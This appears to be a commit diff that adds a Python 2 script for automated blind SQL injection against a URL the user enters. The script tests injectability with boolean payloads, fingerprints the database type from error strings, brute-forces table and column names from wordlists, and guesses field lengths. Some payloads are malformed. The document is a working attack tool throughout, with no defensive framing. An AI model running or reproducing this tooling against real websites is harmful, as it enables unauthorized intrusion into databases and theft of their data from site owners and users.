1+ import requests
2+ from bs4 import BeautifulSoup
3+ from re import search
4+ import os
5+ import string
6+ import urllib
7+ use = raw_input ('Enter the URL for SQL injection:' )
8+ user = use
9+ def Webpage ():
10+ global header ,link
11+ url = "{}" .format (user )
12+ header = {'User-Agent' :'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36' }
13+ link = requests .get (url ,headers = header )
14+ if link .status_code == 200 :
15+ print ('URL stability can be linked.' )
16+ else :
17+ print ('URL link failure' )
18+ exit ()
19+ Webpage ()
20+ def start ():
21+ a = '%20and%201=1'
22+ b = '%20and%201=2'
23+ url = user
24+ urla = user + a
25+ urlb = user + b
26+ page = urllib .urlopen (url ).read ()
27+ pagea = urllib .urlopen (urla ).read ()
28+ pageb = urllib .urlopen (urlb ).read ()
29+ if page == pagea and page != pageb :
30+ print ('Existence of SQL injection !' )
31+ else :
32+ print ('SQL injection does not exist' )
33+ exit ()
34+ start ()
35+ def database ():
36+ print ('[!]Try to judge the type of the database' )
37+ db = ''
38+ sql = "" .join ('%20and20%user>0' )
39+ url = user
40+ pgex = urllib .urlopen (url + sql ).read ()
41+ if search ('ODBC Microsoft Access' ,pgex ) or search ('Microsoft JET Database' ,pgex ):
42+ print ('data base: Access' )
43+ return db
44+ elif search ('SQL Server' ,pgex ) or search ('nvarchar' ,pgex ):
45+ print ('database: MSSQL' )
46+ return db
47+ elif search ('You have an error in your SQL syntax' ,pgex ) or search ('Query failed' ,pgex ) or search ('SQL query failed' ,pgex ) or search ('mysql_fetch_' ,pgex ) or search ('mysql_num_rows' ,pgex ) or search ('The used SELECT statements have a different number of columns' ,pgex ) or search (" Warning: mysql_fetch_array():" ,pgex ):
48+ print ('data base: MYSQL' )
49+ return db
50+ else :
51+ print ('No database type is judged!' )
52+ exit ()
53+ database ()
54+ def stopwatch ():
55+ global tables
56+ liudao = []
57+ tables = open ('dict.txt' ,'r' ).read ().split ('\n ' )
58+ for b in tables :
59+ tablesurl = "%20and%20exists%20(select%20*%20from%20{})" .format (b )
60+ page = urllib .urlopen (user ).read ()
61+ pagex = urllib .urlopen (user + tablesurl ).read ()
62+ if page == pagex :
63+ liudao .append (tablesurl )
64+ else :
65+ pass
66+ if len (liudao )== 0 :
67+ print '[-]Unable to find table name'
68+ else :
69+ print '[+]Find the name of the table'
70+ for c in liudao :
71+ print user ,c
72+ stopwatch ()
73+ uii = raw_input ('Please specify a table:' )
74+ def filed (s ):
75+ shengdao = []
76+ fileds = open ('fileds.txt' ,'r' ).read ().split ('\n ' )
77+ for x in fileds :
78+ filedsurl = string .join (['%20and%20exists%20(select%20' ,x ,'%20from%20' ,s ,')' ],'' )
79+ page = urllib .urlopen (user ).read ()
80+ pagex = urllib .urlopen (user + filedsurl ).read ()
81+ if page == pagex :
82+ shengdao .append (filedsurl )
83+ else :
84+ pass
85+ if len (shengdao ) == 0 :
86+ print '[-]Unable to find fileds name'
87+ else :
88+ print '[+]Find the name the fileds'
89+ for f in shengdao :
90+ print user ,f
91+ filed (uii )
92+ luwei = raw_input ('Please enter the field name:' )
93+ def filedlen (gy ,djs ):
94+ diyudao = []
95+ fildens = open ('fileds.txt' ,'r' ).read ().split ('\n ' )
96+ for lu in fildens :
97+ payload = string .join (['%20and%201=(select%20count(*)%20from%20' ,gy ,'%20where%20len(' ,djs ,')>' ,lu ,')' ],"" )
98+ page = urllib .urlopen (user ).read ()
99+ pagex = urllib .urlopen (user + payload ).read ()
100+ if page == pagex :
101+ diyudao .append (payload )
102+ else :
103+ pass
104+ if len (diyudao ) == 0 :
105+ print '[-]Sorry to find out the length of field content'
106+ else :
107+ print '[+]Guessing the length of field content'
108+ for gy in diyudao :
109+ print user ,gy
110+ filedlen (uii ,luwei )
0 commit comments